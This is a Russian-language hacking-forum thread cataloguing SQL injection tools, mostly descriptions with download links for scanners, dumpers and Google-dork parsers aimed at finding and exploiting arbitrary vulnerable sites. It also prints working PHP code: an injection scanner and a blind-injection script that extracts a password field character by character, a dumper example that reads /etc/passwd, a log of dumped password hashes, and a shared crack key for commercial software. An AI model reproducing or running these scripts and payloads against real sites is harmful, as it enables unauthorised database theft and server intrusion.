Софт для работы с SQL Injection

Discussion in 'Инструменты' started by HIMIKAT, 9 Nov 2010.

  1. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,726
    Likes Received:
    576
    Reputations:
    402
    ExploitMyUnion

    [​IMG]

    Написанная на Python (+PyQt) тулза для автоматизации эксплуатирования SQL Injection.

    Скачать:
    http://www.sendspace.com/file/gbxaa1
    ----------------------------------------------------------------------------------------------------------------------------------

    BSQL Hacker

    [​IMG]

    Новое мощное средство для проведения инъекций в самые разнообразные виды баз, причём даже не разных веток, а семейств. В первую очередь предназначено для людей, не сильно опытных. Поддерживаются 4 вида SQL-инъекций: Blind SQL Injection, Time Based Blind SQL Injection, Deep Blind (based on advanced time delays) SQL Injection и распознавание уязвимости по выводу соответствующей ошибки базы на WEB-ресурсе. BSQL способен производить попытки инъекции, используя куки, POST-запросы, модифицированные HTTP-заголовки.

    Скачать:
    http://www.sendspace.com/file/624jhg
    ----------------------------------------------------------------------------------------------------------------------------------

    SQL/XSS/LFI/RFI Scanner

    Ищет уязвимости SQL, XSS, LFI, RFI

    В поле Dork вставляем запрос типа
    Code:
    index.php?id= 
    trainers.php?id= 
    buy.php?category= 
    article.php?ID= 
    play_old.php?id=
    В архиве есть список

    Если поставить галочку на Get From All Domians значти что искать будем скули с любыми доменами

    [​IMG]

    Хоп! и короче видим рабочие скули

    [​IMG]

    Если вставить в поле .com, то все домены будут соm кагбэ

    [​IMG]

    Скачать:
    http://narod.ru/disk/26438803000/ExploitScanner.rar.html

    (c) описание by Dr..VATSON
    ----------------------------------------------------------------------------------------------------------------------------------

    Netsparker Community Edition


    [​IMG]

    Одна из ведущих коммерческих разработок для поиска и эксплуатирования уязвимостей в веб-приложениях. Представлена бесплатная версия для Community.

    Скачать:
    http://www.sendspace.com/file/gswl2u

    P.S. данная тема создана для каталогизации всего софта предназначенного, для работы с SQL Injection. А так же чтобы все разрозненные темы подобного содержания, находились в одном месте.
    P.P.S. убедительная просьба весь софт заливать исключительно на [sendspace.com]. Это наиболее удобный во всех отношениях ФО.
     
    10 people like this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,289
    Likes Received:
    1,139
    Reputations:
    886
    InjectoR

    Программа для кодирования исходного текста в ASCII коды
    пригодится когда magic_gpc_quotes=On

    [​IMG]

    Кодер: SMERSH

    Скачать: http://www.sendspace.com/file/zea3i2

    тулзу юзаю примерно 2 года )
     
    _________________________
    #2 Konqi, 9 Nov 2010
    Last edited: 16 Aug 2011
    4 people like this.
  3. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    265
    Likes Received:
    257
    Reputations:
    154
    Havij 1.13

    [​IMG]

    Особенности:
    Поддерживаемые базы данных с инъекционными методами:
    MsSQL 2000/2005 с ошибкой
    MsSQL 2000/2005 никакой ошибки (union based)
    MySQL (union based)
    MySQL слепая
    MySQL ошибка основана
    Oracle (union based)
    MSAccess (union based)
    Автоматическое обнаружение базы данных
    Автоматическое определение типа (строка или целое число)
    Автоматическое обнаружение ключевых слов (поиск разница между положительным и отрицательным ответом)
    Попытки различных синтаксисов инъекций
    Поддержка прокси
    Реальный результат времени
    Функции для замены пространства /**/,+,... от IDS и фильтры
    Старайтесь не использовать строки (magic_quotes аналогичные обойти фильтры)
    Обход незаконного союза
    Полный настраиваемые заголовки HTTP (например, ссылка и User Agent)
    Нагрузка куки с сайта для проверки подлинности
    Догадываясь, таблиц и столбцов в базе <5 (а также в слепых) и MSAccess
    Быстрое получение таблиц и столбцов для MySQL
    Multi нить Администратор страницы поиска
    Multi поток Интернет MD5 взломщика
    Начало Информация СУБД
    Как таблиц, столбцов и данных
    Командная executation (MSSQL только)
    Чтение системных файлов (MySQL только)
    вставки / обновления / удаления данных

    Скачать
     
    #3 ~d0s~, 9 Nov 2010
    Last edited: 9 Nov 2010
    2 people like this.
  4. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    288
    Likes Received:
    289
    Reputations:
    195
    Crypto SQL (Автор CodeSender https://forum.antichat.ru/member.php?u=133052)

    [​IMG]

    - Генерирует указанное число полей для UNION запроса
    - Кодирует заданную строку в Hex, Char, Aes


    Скачать


    rsaUnDumper[sql] – универсальный дампер SQL INJECTION

    [​IMG]

    Описание:
    • многопоточность (от 1 до 100 потоков);
    • поддержка http прокси;
    • система передышек (для предотвращения ддоса);
    • возможность дампа практически любых данных (от версии MySQL, до выборочных ячеек БД);
    • возможность указать свой UserAgent, Referer;
    • реализована система «Пауза \ Продолжить dump» (вы можете приостановить процесс, усыпить комп на ночь, а утром продолжить как ни в чем не бывало );
    • реализована система повторной проверки тех запросов к серверу, при выполнении которых произошла ошибка;
    • отображение кол-ва потоков, работающих в данный момент;
    • отображение общего числа limit-ов;
    • отображение последнего limit-а, которому был послан запрос;
    • отображение кол-ва ответов, которые были записаны в файл;
    • автоматическая система проверки новых версий программы, теперь вы всегда будете в курсе последних обновлений;
    • сворачивание программы в трей (если дамп предвидится большой – незачем мозолить глаза лишними вкладками);
    • сохранение настроек в конфиг файл при закрытии программы и автозагрузка их при запуске;
    • информативные всплывающие подсказки при наведении на элементы интерфейса;

    Требования: установленный .Net Framework 2.0+

    Mini FAQ:

    - запрос должен начинаться на http:// и заканчиваться конструкцией limit (подробнее во всплывающей подсказке), активное поле вывода в запросе замените на <{param}>, после чего в поле «Данные для дампа…» перечислите имена того, что нужно сдампить (например версия MySQL, пользователь MySQL, имена колонок…).

    Скачать


    [Perl] SQLinjector V2.0 by AlpHaNiX

    Описание:


    - Evasion choise
    - Proxy support
    - URL Extractor + Vuln Scanner & Checker

    Avaible Options :

    MySQL

    MySQL column length calculator MySQL v4/5
    MySQL target website db global infos MySQL v4/5
    MySQL Full Schema Extractor MySQL v5
    MySQL Data Dump MySQL v4/5
    MySQL load_file fuzzer MySQL v4/5
    MySQL Table_name Fuzzer MySQL v4
    MySQL Column_name Fuzzer MySQL v4

    MsSQL

    MsSQL DB global info
    MsSQL Tables Extractor
    MsSQL Columns Extractor
    MsSQL Data Dumper

    Vulunerability Scanner

    URL Extractor , SQL Vulnerability’s Scanner & Checker


    Скачать


    [Perl] Sqli scanner script by int3

    Описание:

    - Многопоточный сканнер на наличие SQL Инъекций
    - Поддержка прокси
    - Сканирует по списку URL из файла


    Скачать



    Sql injection scanner by Pr0xY (Sh3ll.Team)

    PHP:
    <?php
     
     
    #Sh3ll.Team 2008-08-28
     #Sql injection scanner by Pr0xY
     
     
    $http  '';
     
     if(
    $http == '')
        die(
    "Http is empty!\n\n<b>Powered by Pr0xY</b>\n# Sh3ll.Team [2008-09-02]");
     
     echo 
    "Scan for : <b>$http</b> \n\n";
     
     
    $http  = (substr($http, -1) != '/') ? $http.'/' $http;
     
    $found getGet();
     
     function 
    getGet()
     {
        global 
    $http;
         
        
    $getN = array();
        
    $fenN = array();
                     
        
    $htm = @file_get_contents($http);
              @
    preg_match_all('/((\/[a-zA-Z0-9]+\/)|)([a-zA-Z0-9]+\.[a-zA-Z0-9]+\?)([a-zA-Z0-9]+)(\s*\=)([a-zA-Z0-9]+)/im'$htm$gets);
     
        foreach(
    $gets[0] as $get)
        {
           
    $get str_replace($http''$get);
       
           if(!
    in_array($get$getN))
           {
              @
    preg_match_all('/(.*)(\?)/'$get$gn);
               
    $name str_replace('?'''$gn[1][0]);
     
               if(!@
    in_array($name$fenN) && @in_array(substr(strrchr($name"."), 1), array('php''asp''aspx'))){
                  
    $getN[] = $get;
                   
    $fenN[] = $name;
               }   
           }   
        }
        return 
    $getN;
     }
     
     foreach(
    $found as $get)
     { 
        
    $address $http.$get;
        
        
    $htm1 = @file_get_contents($address);
        
    $htm2 = @file_get_contents($address.'%20and%20\'a\'%20=%20\'a\'');
         
        if(
    $htm1 == $htm2)
           echo 
    $get." <b><font color=\"#1B9B1B\">SQL injection!</font></b> \n";
        else
           echo 
    $get." <b><font color=\"#D80404\">Failed!</font></b> \n";
         
     }
     
     echo 
    "\n\n<b>Powered by Pr0xY</b>\n";
     
    ?>

    Absinthe 1.4.1 (Windows, Linux)

    [​IMG]

    Описание:


    - Автоматизированная утилита для проведения атак класса SQL-injection.
    - Поддержка MS SQL Server, MSDE, Oracle, Postgres.
    - Эксплуатация инъекций различными способами (GET,POST,COOKIE).
    - Возможность использования SSL.
    - Прокси.
    - Поддержка Blind, Error Based.
    - Вывод лога работы в файл.



    Скачать (Версия для Windows)

    Скачать (Версия для Linux)



    MySQL Dump v 1.0 (Coded By Flash http://h4cky0u.org)

    [​IMG]

    Описание:

    - Дамп базы через MySQL инъекцию.
    - Парсер уязвимых дорков.
    - Сканнер спарсенных URL на наличие SQL инъекций
    - Опциональный выбор поисковика, через который будут парситься дорки (Google, Yahoo, Live Search, Altravista, Terravista).
    - Выставление задержек.
    - Поддержка GET,POST.
    - Конвертер Hex, Char.
    - Поиск MD5 хэша по онлайн базам.

    Скачать


    SQL checker by Acid Version 1.4 (http://forum.xaknet.ru/member.php?u=41587)

    [​IMG]


    Описание:

    - Парсит поисковики, находит ссылки и сохраняет их в файл, затем проверяет этот файл на наличие SQL инъекций, и если таковые обнаружены, то раскручивает скулю до вида:
    "http://site.com/cart.php?id=23-1999+union+select+1,2,3,4,5,6,7,8--".
    - Парсит по заданному списку дорков или рандомно
    - Встроенный парсер bing.com
    - Многопоточный
    - Прогресс бар


    Скачать


    Скрипт для раскрутки MySQL Blind Инъекций без пробелов и запятых
    (Автор v1d0q https://rdot.org/forum/member.php?u=322)

    PHP:
    <?php
    function send_xpl($url$xpl){ 
        
    $u=parse_url($url); 
        
    $req ="GET ".$u['path']."/".$xpl." HTTP/1.1\r\n"
        
    $req.="Host: ".$u['host']."\r\n"
        
    $req.="Connection: Close\r\n\r\n"
        
    $fs=fsockopen($u['host'], 80$errno$errstr30) or die("error: $errno - $errstr<br>\n"); 
        
    fwrite($fs$req); 
        while (!
    feof($fs)) { 
              
    $res .= fread($fs8192); 
        } 
        
    fclose($fs); 
        return 
    $res

    function 
    xpl($field$condition$pos){ 
        global 
    $from
        
    $xpl="?id=(155)and(lower(ascii(substring((select($field)$from)from($pos)for(1)))))$condition/*"
        return 
    $xpl

    function 
    cond($url$field$cond$pos$ch) { 
        global 
    $tfind
        if(
    preg_match('/'.$tfind.'/'send_xpl($urlxpl($field,$cond.$ch,$pos)))) 
            return 
    1
        else 
            return 
    0

    function 
    getChar($url$field$pos$lb=0$ub=255) { 
        while(
    true) { 
            
    $M floor($lb + ($ub-$lb)/2); 
            if(
    cond($url$field'<'$pos$M)==1) { 
                
    $ub $M 1;  
            } 
            else if(
    cond($url$field'>'$pos$M)==1) { 
                
    $lb $M 1
            } 
            else 
                return 
    chr($M); 
            if(
    $lb $ub
                return -
    1
        } 

    $tfind="textfromtruequery";  
    $url="http://site.ru"
    $field="pwd"//всегда должно быть тру. 
    $from="from(db.table)where(login=0x61646d696e)"
    if(
    preg_match('/'.$tfind.'/'send_xpl($urlxpl("version()",">1",1,$from)))) 

        echo 
    "works\r\n"

    else  
        die(
    "check sql query"); 
    for(
    $i=1;$i<=100;$i++) 

    $c getChar($url$field$i46122$from); 

            if(
    $c==-1
            die(
    "\r\nend"); 
        else  
            echo 
    $c

    ?>

    [Perl] MySQL injector by Login - Root


    Описание:

    - Подбор количества столбцов
    - Hex значений при magic_quotes - on
    - Вывод таблиц, колонок, баз, попытка чтения /etc/passwd/ через load_file() и тд


    Вывод работы скрипта:

    [​IMG]

    Скачать


    MsSQL Injection Helper v 1.0

    [​IMG]

    Скачать


    MsSQL Injection Helper v 1.1

    [​IMG]


    Скачать



    SQL Injection Finder

    [​IMG]

    Описание:

    - Парсит сайты подверженные SQL инъекциям по указанному дорку

    Скачать
     
    #4 h00lyshit!, 9 Nov 2010
    Last edited: 10 Nov 2010
    6 people like this.
  5. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    288
    Likes Received:
    289
    Reputations:
    195
    SQL Injector By Dr.Z3r0 (PHP) (https://rdot.org/forum/member.php?u=21)

    Описание:

    - Скрипт проверяет переданный ему линк на скуль иньекты (по средствам BENCHMARK).
    После того, как скуль иньект обнаружен, скрипт определяет количество полей, выводимое поле, и если версия MySQL5 выводит дамп information_schema.
    - Умеет обходить фильтрацию кавычек, пробелов и основных ключевых операторов.


    Юзать так: script.php?link=http://test.ru/news.php?id=1

    Где http://test.ru/news.php?id=1 - ссылка для проверки на инъект

    Скачать


    Blind SQL Injector By Lukmus (Ruby)
    (https://forum.antichat.ru/member.php?u=104387, http://blog.lukmus.ru)


    Описание:

    - Многопоточный скрипт для проведения Blind MySQL инъекций
    - Подбор символов через их ASCII коды
    - Вычисляет паралельно несколько символов, количество которых, равно количеству потоков заданных в конфигурационном файле.


    Скачать



    Blind SQL Injection Dumper v1.1 By Shadow (Win32 Console)
    (https://rdot.org/forum/member.php?u=12)


    Описание:

    1. Возникает сложность при использовании большой и сложной конструкции запроса, особенно при переборе с использованием LIMIT.
    Утилита с ключом -q позволяет автоматизировать этот процесс.
    На вход подаете SQL запрос к какой нибудь таблице, прога добавляет условно бесконечный LIMIT на выходе получаете дамп на консоли и в файле.
    2. При чтении файла данным способом вывод ограничивается 64 символами.
    Утилита с ключом -f позволяет автоматизировать этот процесс и дампить файл блоками по 64 символа.
    На вход подаете полный путь до файла который нужно сдампить с целевого хоста, на выходе получаете дамп в файле.


    Синтаксис:

    BlindSQLiDumper.exe [full path whith vuln param] -[q,f [param]] [file out(default result.txt)]

    -q [sql query to unlimit repeat]
    -f [full path to filename for download]


    Пример для дампа данных:

    BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -q "select table_name from information_schema.tables" tables.txt


    Пример для дампа файла:

    BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -f /etc/passwd passwd

    Особенности:

    1. Имя хоста без http://
    2. SQL запрос обязательно в кавычках.
    3. По умолчанию создается файл result.txt в текущей дире.
    4. Имя файла без кавычек, т.к. автоматически преобразует в hex эквивалент.
    5. Естественно необходим file_priv = Y


    Лог работы:

    HTML:
    ========================
    Blind SQL Injection Dumper
    by [53x]Shadow for Antichat.ru
    Based on Qwazar Fast Blind SQL Injection Method
    Need MySQL version >= 5.0.* 
     ========================
    start...
    sql query: select password from users
    query result:  358fa3824cfe5ac363f5ec254eafff57  acd455efd4541bf9b2e05f895c957e83
    Dump stopped!
    
    Скачать


    SQL Scanner By Oxygenique (VB6)

    Описание:

    - Чекер выдачи поисковиков на SQL инъекции, путем подставления кавычки в целевой запрос.


    [​IMG]

    Скачать
     
    #5 h00lyshit!, 14 Nov 2010
    Last edited: 15 Nov 2010
    1 person likes this.
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    297
    Likes Received:
    33
    Reputations:
    18
    WebCruiser - Web Vulnerability Scanner V2.4.2

    [​IMG]

    Описание:
    * Crawler(Site Directories And Files);
    * Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.;
    * SQL Injection Scanner;
    * SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept);
    * SQL Injection for SQL Server: PlainText/Union/Blind Injection;
    * SQL Injection for MySQL: PlainText/Union/Blind Injection;
    * SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection;
    * SQL Injection for DB2: Union/Blind Injection;
    * SQL Injection for Access: Union/Blind Injection;
    * Post Data Resend;
    * Cross Site Scripting Scanner and POC;
    * XPath Injection Scanner and POC;
    * Auto Get Cookie From Web Browser For Authentication;
    * Report Output.

    Скачать
    линк

    лекарство от жадности:
    st0p.org
    9EF6-CC8C-F068-B1D6


    Standalone NoMore AND 1=1 v04
    [​IMG]
    Описание:
    хороший сборник/помошник готовых запросов для пентестинга(не только SQL injection)
    Скачать
    линк
    вторая ссыл http://upwap.ru/1133629
    перезалил еше на другой фо дабы некоторые не смогли качать последнюю, но у мну качается
     
    #6 YuNi|[c, 15 Nov 2010
    Last edited: 18 Nov 2010
    1 person likes this.
  7. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,726
    Likes Received:
    576
    Reputations:
    402
    Linux tools

    Linux tools

    Blind SQL Injection Perl Tool

    Blind SQL Injection Perl Tool (bsqlbf) - небольшой скриптик на Perl для извлечения информации из баз данных сайтов, уязвимых к sql-инъекциям.

    Скачать:
    http://www.sendspace.com/file/kexay0

    FG Injector 0.9a

    FG-Injector - открытый фреймворк, призванный помочь в поиске уязвимостей класса sql-injection в веб-приложениях. Включает в себя встроенный прокси для перехвата и модификации HTTP-запросов, а также интерфейс для автоматической эксплуатации уязвимостей.

    Скачать:
    http://www.sendspace.com/file/y6ugyu

    MySqloit 0.2

    MySqloit - утилита для проведения sql-инъекций на LAMP (Linux, Apache, MySQL, PHP) и WAMP (Windows, Apache, MySQL, PHP) платформах. Умеет загружать и выполнять шеллкоды из Metasploit Framework через SQL-Injection уязвимости в MySql.

    Скачать:
    http://www.sendspace.com/file/6wr6sv

    SQID 0.3

    SQLID (SQL Injection digger) - консольная программка для автоматизации поиска и эксплуатации sql-инъекций и других ошибок. Ищет инъекции на веб-страницах, а также тестирует все поля для ввода на наличие возможных уязвимостей к инъекции.

    Скачать:
    http://www.sendspace.com/file/6951a9

    SQL Power Injector 1.2

    SQL Power Injection - инструмент, помогающий пентестеру выполнять SQL команды через уязвимую страницу. Его основное заключается в способности автоматизировать и ускорить "слепые" инъекции за счет распараллеривания на несколько потоков.

    Скачать:
    http://www.sendspace.com/file/13pbab

    Sqlbftools 1.2


    SQLbftools - набор инструментов для извлечения информации из MySQL-базы данных при помощи "слепой" sql-инъекции.

    Скачать:
    http://www.sendspace.com/file/16crex

    SQLBrute

    SQLBrute - инструмент для извлечения данных из БД при помощи "слепых" sql-инъекций. Использует брут по времени ответа сервера и по возвращенной сервером ошибке для Microsoft SQL Server, и брут по ошибке для Oracle. Написан полностью на Python, многопоточен и не требует установки дополнительных библиотек.

    Скачать:
    http://www.sendspace.com/file/6owsla

    SQLIer 0.8.2b

    SQLIer - принимает в качестве входных данных уязвимую к инъекции URL и пытается определить всю необходимую информацию для построения ядовитого запроса к БД. Почти не требует участия пользователя (в случае, если программа не смогла корректно определить имя таблицы/поля, пользователю все же приходится помочь ей). Строит UNION SELECT запросы для извлечения паролей из базы.

    Скачать:
    http://www.sendspace.com/file/0eq575

    Sqlmap 0.8

    Утилита, написанная на языке Python, предназначенная для автоматизации так называемых слепых SQL инъекций. Поддерживает MySQL, PostgreSQL и Microsoft SQL Server.

    Скачать:
    http://www.sendspace.com/file/qoid5u

    SQLNinja 0.2.3

    Sqlninja - маленький инструмент на Perl для эксплуатации уязвимости SQL-injection. Его главная цель состоит в том, чтобы обеспечить удаленный доступ к уязвимому серверу базы данных. В новой версии можно выделить такие изменения, как оптимизацию брутофорс-метода, возможность использования пробела в строках эксплоита и установку исходного значения FQDN, равное 250.

    Скачать:
    http://www.sendspace.com/file/e0cwks
     
    6 people like this.
  8. to.Index

    to.Index Member

    Joined:
    3 Jul 2010
    Messages:
    49
    Likes Received:
    22
    Reputations:
    5
    Havij v1.14 Advanced SQL Injection Tool

    Havij v1.14 Advanced SQL Injection tool.
    [​IMG]
    Новые возможности этой версии:

    * Sybase (ASE) базы данных добавил.
    * Sybase (ASE) Слепой базы данных добавил.
    * Время метода, основанного на MsSQL добавил.
    * Время метода, основанного на MySQL добавил.
    * Mod_security обойти добавил.
    * Пауза добавлена кнопка.
    * Обычная проверка подлинности добавил
    * Выборочная проверка подлинности добавил.
    * Сообщение данных поля добавил
    * Ошибки, связанные с символа точки в имени базы данных фиксированной
    * Синтаксис более писать, когда определяется пользователем в слепой инъекции фиксированной.
    * Обнаружение MSSQL базы данных от ошибок при использовании JDBC драйвера исправлена.
    * Тайм-аут ошибка в md5 взломщик фиксированной.
    * Значение по умолчанию исправлена ошибка
    * Строка кодирования исправлена ошибка в PostgreSQL
    * Инъекционных URL переписать страницы добавил.
    * Введения в любую часть HTTP-запрос вида печенья, User-Agent, Referer, и т.д. доступны
    * Ошибка в поиске строку столбца фиксированной. (Специально для MySQL)
    * Поиск столбцов кол в MySQL, когда входное значение не является эффективным добавил.
    * Размера окна ошибку в пользовательских точек на дюйм фиксированной.
    * Некоторые ошибки в поиске количество строк фиксированной.
    * Получение имя базы данных в MSSQL ошибка основана при инъекции типа угадывается целое, но это строка фиксированной.​

     
  9. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,726
    Likes Received:
    576
    Reputations:
    402
    Safe3 SQL Injector

    [​IMG]

    Полезный инструмент пентестера, позволяющий реализовывать инъекции в MySQL, Oracle, PostgreSQL, MSSQL, ACESS, DB2, Sybase, Sqlite, с помощью Error/Union/Blind/Force SQL injection техник. При этом тулза может проверить на стойкость WAF (Web Application Firewall) на стороне сервера.

    Скачать:
    http://www.sendspace.com/file/avza1j

    Context App Tool

    [​IMG]

    Комплекс для полуавтоматического пентеста, включающий ряд полезных инструментов. Работает в зависимости "от контекста" - отсюда и название. Один из них - модули для обнаружения SQL- и XSS-инъекций, а также фаззинг форм для обнаружения CRSF багов.

    Скачать:
    http://www.sendspace.com/file/kyc5n3

    ESF

    [​IMG]

    Инструмент для определения версий Microsoft SQL Server 2000, Microsoft SQL Server 2005 и Microsoft SQL Server 2008. Особенностью программы является не "сырое" отображение версии, а привязка ее к определенному сервис паку и релизу. Таким образом, ESF может подсказать, какие патчи еще не установлены.

    Скачать:
    http://www.sendspace.com/file/ly8pzt

    Grendel-Scan

    [​IMG]

    Перед нами кроссплатформенный сканер для поиска уязвимостей в веб-приложениях. Среди задач во время разработчики обозначили: полную кроссплатформенность, GUI для всех ОС, отсутствие зависимостей (кроме Java), обнаружение и использование найденных уязвимостей. В итоге со всеми требованиями у них получилось выпустить довольно универсальный сканер, включающий:
    • встроенный прокси для перехвата данных
    • фаззер HTTP-запросов, в том числе собранных полностью вручную
    • модуль для SQL injection
    • CRLF injection
    • Cross-site request forgery (CSRF)
    • обнаружение скрытых директорий (Directory traversal)
    • модуль для выяснения данных о жертве (обработка Robots.txt, ошибок системы и т.д.)
    • пентест конфигурации веб-демона (Cross-site tracing, Proxy detection)
    В общем-то, это был бы самый обычный сканнер, если бы не реализация некоторых редких видов атак, вроде разновидности XSS – cross-site request forgery.

    Скачать:
    http://www.sendspace.com/file/joz59q

    Hexjector

    [​IMG]

    Открытая разработка для автоматизированного поиска ошибок в скриптах, которые могут привести к SQL-инъекциям.

    Скачать:
    http://www.sendspace.com/file/5h6qiu
     
  10. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    288
    Likes Received:
    289
    Reputations:
    195
    rsaUnDumper[sql] 2.0– универсальный дампер SQL INJECTION

    [​IMG]

    Описание:


    Отличия от версии 1.5:

    • Добавлена возможность редактирования заголовков

    • Работа через POST

    • Поддержка SOCKS4/SOCKS5 прокси



    Требования: установленный .Net Framework 2.0+


    Скачать
     
    1 person likes this.
  11. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,726
    Likes Received:
    576
    Reputations:
    402
    sqlinject-finder

    [​IMG]

    Этот небольшой скрипт предназначен для поиска SQL-injection по pcap-файлам снифера. Скрипт смотрит в GET- и POST-запросах возможные места для проведения атаки и выводит отчет в понятном виде. Помимо существующей базы проверок достаточно просто добавить и свои правила. Программа очень полезна при расследовании инцидентов, если необходимо определить, как злоумышленник проник в систему, и закрыть уязвимость.

    Скачать:
    http://www.sendspace.com/file/og8afs

    SFX-SQLi

    [​IMG]

    Описание техники инъекций (Select For XML SQL injection) и утилита для ее реализации. Техника основана на ошибке в FOR XML, позволяющей конвертировать все содержание таблицы в одну строчку, и позволяет извлечь дамп данных из Microsoft SQL Server 2005/2008.

    Скачать:
    http://www.sendspace.com/file/hvghaz
    http://www.sendspace.com/file/44mn6k [source code]
    http://www.sendspace.com/file/dojcle [описание техники]

    ProxyStrike

    [​IMG]

    Помощник для пентеста приложений, реализованный в виде прокси. На данном этапе развития имеет модули для реализации SQL-Inj и XSS.

    Скачать:
    http://www.sendspace.com/file/p6afel
    www.youtube.com/watch?v=l8kioy4QX7U [video manual]

    SecuBat

    [​IMG]

    Сканнер безопасности, заточенный для анализа веб-сайтов на наличие Sql-инъекций и XSS.

    Скачать:
    http://www.sendspace.com/file/alfvwr

    WITOOL

    [​IMG]

    Тулза для реализации SQL-инжекций в SQL Server и Oracle c GUI-интерфейсом, написанная на .NET (а потому требующая установленный в системе фреймворк).

    Скачать:
    http://www.sendspace.com/file/c074hh
     
  12. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,726
    Likes Received:
    576
    Reputations:
    402
    sqlsus

    [​IMG]

    Специальная утилита для реализации инъекций в базы данных MySQL. С помощью sqlsus ты намного проще сможешь эксплуатировать найденный баг, получив структуру базы, внедрив SQL-запрос, скачав с сервера нужные файл, закачав бэкдор и т.д., и т.п. Примечательно, что в качестве инструмента для хранения полученных дампов используется база SQLite, что чрезвычайно удобно. Можно, например, сделать копию базы, переместив таблицы или колонки с уязвимого сервера себе в локальную базу на SQLite и полноценно работать с ней. Если ты не можешь обратиться к базе information_schema, или если ее не существует, тулза поможет пробрутфорсить название таблиц и колонок. sqlsus поможет реализовать и blind-инъекции.

    Скачать:
    http://dl.dropbox.com/u/20490401/sqlsus-0.5rc1.tgz

    Paros

    [​IMG]

    Этот хитрый прокси-сервер, написанный на JAVA, позволяет тестировать веб-приложения на наличие распространенных ошибок. Порой подмена referer'a обеспечивает прямой доступ к админке, а неправильно составленная кука совершенно непредсказуемо обрабатывается. С помощью Paros ты можешь «на лету» изменять исходящие HTTP/HTTPS запросы, логировать собственный траф, проверять сайты на наличие SQL Injection и XSS уязвимостей с помощью встроенных специальных утилит. Получаем сканнер и MITM proxy в одном лице! Думаю, ты поймешь, что можно творить с помощью Paros.

    Скачать:
    http://dl.dropbox.com/u/20490401/paros-3.2.13-win.exe

    w3af

    [​IMG]

    w3af - это фреймврок для поиска и эксплуатации атак на веб-приложения. Что-то вроде Metasploit, но в контексте веб-приложений. w3af состоит из ядра и плагинов, который пишутся на Python'е. Сейчас в проект включены более 130 аддонов, реализующие проверки и эксплуатацию SQL инъекций, xss, локальный и удаленные инклуды и т.д.

    Скачать:
    http://dl.dropbox.com/u/20490401/w3af-1.0-rc3.exe
     
  13. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,726
    Likes Received:
    576
    Reputations:
    402
    WebCruiser - Web Vulnerability Scanner

    [​IMG]

    Автоматизированный сканнер безопасности веб-проектов. Включает в себя паука (crawler), исследующего структуру каталогов, механизмы для поиска разного типа уязвимостей (SQL Injection, Cross Site Scripting, XPath Injection и т.д.), инъектор данных в GET/Post запросы и кукисы, а также другие места.

    Скачать:
    http://dl.dropbox.com/u/20490401/WebCruiser.zip

    Wfuzz

    [​IMG]

    Универсальная программа для пентеста веб-приложений. Включает в себя брутфорсер форм, GET- и POST-запросов, сканнер для поиска инжекций (SQL, XSS, LDAP), универсальный фаззер для использования в веб-среде.

    Скачать:
    http://dl.dropbox.com/u/20490401/wfuzz-1.4b-win.tar.gz

    WebSlayer

    [​IMG]

    Основная цель приложения – брутфорс различных мест в веб-приложениях.

    Скачать:
    http://dl.dropbox.com/u/20490401/WebSlayer-Beta.msi
     
    1 person likes this.
  14. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,726
    Likes Received:
    576
    Reputations:
    402
    Слепой кот

    [​IMG]

    The experimental multithreaded tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.

    Скачать:
    http://dl.dropbox.com/u/20490401/blind_cat.zip
    http://dl.dropbox.com/u/20490401/blind_cat_source.zip [source]
    Видео демонстрации возможностей:
    http://www.youtube.com/watch?v=Dkp4artwJnE
     
  15. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    294
    Likes Received:
    26
    Reputations:
    11
    SQLi Checker

    SQLi Checker

    SQLi Checker – программа для проверки списка URL’ов на наличие уязвимостей типа SQL Injection

    [​IMG]


    Функционал:

    Многопоточность (программно)
    Поддержка HTTP(s) прокси
    Поддержка SSL





    Пример source:
    Code:
      http://site.com/index.php?id=1
        http://site.com/index.php?inc=ololo&id=1
        …
    Скачать SQLi Checker

    Источник i-pro.name
     
    1 person likes this.
  16. 0xN00B

    0xN00B New Member

    Joined:
    30 Nov 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Subgraph Vega Vulnerability Scanner

    [​IMG]

    Описание: Vega это платформа с открытым исходным кодом для тестирования безопасности веб-приложений. Vega поможет вам найти такие уязвимости как SQL-инъекции, Cross-Site Scripting (XSS), обнаружить раскрытие конфиденциальной информации, а также другие уязвимости. Приложение написано на языке Java, имеет GUI интерфейс и доступно на Linux, OS X и Windows.

    Официальный сайт: subgraph.com
     
    #16 0xN00B, 9 Dec 2011
    Last edited: 9 Dec 2011
  17. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    294
    Likes Received:
    26
    Reputations:
    11
    Парсер дорков Google,Yahoo,Bing

    Search Engine Scraper V0.2​

    [​IMG]
    + Работает с прокси
    + Возможность закгрузки кейвородов (дорков) из списка
    + Возможность выбрать домен поисковой системы(RU,DE...)
    + Возможность выбрать язык
    + PR checker
    - Подвисает

    Источник:bottopia.com
    Скачать
    VT
